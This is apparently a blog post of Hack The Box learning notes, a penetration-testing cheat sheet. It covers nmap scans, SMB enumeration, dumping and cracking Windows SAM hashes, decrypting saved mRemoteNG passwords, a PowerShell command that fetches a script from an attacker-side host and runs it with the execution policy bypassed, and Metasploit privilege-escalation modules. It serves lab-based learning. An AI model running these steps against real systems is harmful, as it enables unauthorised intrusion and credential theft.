Hackthebox learning note 1

Posted bybsderekPosted inUncategorized

Scanning the target machine

using the script [https://github.com/21y4d/nmapAutomator] (recommanded)

nmap -sC -sV [target IP address] [more options can be added]

  • -sC: script scanning
  • -sV: scan version
  • -A: Enable OS detection, version detection, script scanning, and traceroute
  • –open: Only show open (or possibly open) ports

nmap –script all -p445 [target IP address]

SMB enumeration

smbclient -L //[target IP address]

  • -L: list of shares available on a host

smbclient \\\\[target IP address]\\[sharename]

Mounting files

mount -t cifs //[target IP address]/Backups /mnt/backup -o rw

  • -t: type of the file system
  • o: comma-separated list of mount options

reading VHD(Virtual Hard Disk)

7z l filename.vhd (only can see the list, not the content of the files)

  • l: List contents of archive

{apt-get install libguestfs-tools}(using to see the content of the file)

guestmount –add [vhd image] –inspector –ro [mount point] -v

  • –add: add image
  • –inspector: automatically mount filesystems
  • –ro: mount read only
  • -v: version

Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM

Samdump2 SYSTEM SAM

Password hash format

Username:ID:LM hash:NT hash:comment:remark

If LM hash starts with “aad3”, it means the field is empty

If NT hash starts with “31d6”, it means the field is empty

Cracking password using [https://crackstation.net]

Transferring file in windows

Recommend way [https://github.com/411Hall/JAWS]

powershell.exe -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.12/jaw

s-enum.ps1′,’C:\Users\L4mpje\Desktop\jaws-enum.ps1′) {transferring the script from Linux to target system}

powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1

Exploiting mRemoteNG (C:\Users\\AppData\Roaming\mRemoteNG)

type confCons.xml (look for the password in this file)

[https://github.com/haseebT/mRemoteNG-Decrypt]

python3 mremote_decrypt.py -s “password string”

Windows-Exploit-suggester

use post/multi/recon/local_exploit_suggester

msf post(local_exploit_suggester) > set lhost [IP address]

msf post(local_exploit_suggester) > set session 1

msf post(local_exploit_suggester) > exploit

Windows Gather Applied Patches

use post/windows/gather/enum_patches

msf post(enum_patches) > set session 1

msf post(enum_patches) > exploit

Sherlock [https://github.com/rasta-mouse/Sherlock]

(In the meterpreter session)

load powershell

powershell_import ‘/root/Desktop/Sherlock/Sherlock.ps1’

powershell_execute “find-allvulns”

JAWS – Just Another Windows (Enum) Script [https://github.com/411Hall/JAWS]

(In the meterpreter session)

upload /root/Desktop/jaws-enum.ps1 .

Shell

powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

PowerSploit [https://github.com/PowerShellMafia/PowerSploit]

(In the meterpreter session)

load powershell

powershell_import ‘/root/Desktop/PowerSploit/Privesc/PowerUp.ps1’

powershell_execute Invoke-AllChecks

axebox

author: bs

Published by bsderek

We are just 2 new authors doing writeup on related Cybersecurity topics to educate ourselves. We encourage you to leave a comment in areas where we can improve in terms of skills/knowledge. If we are incorrect in our writeup , please informed us and send us article to read to better educate ourselves. Feel free to leave a comment behind. Hope you have a nice day!! And don’t forget to hack your life away!!! Peace (00)

Leave a comment

Design a site like this with WordPress.com
Get started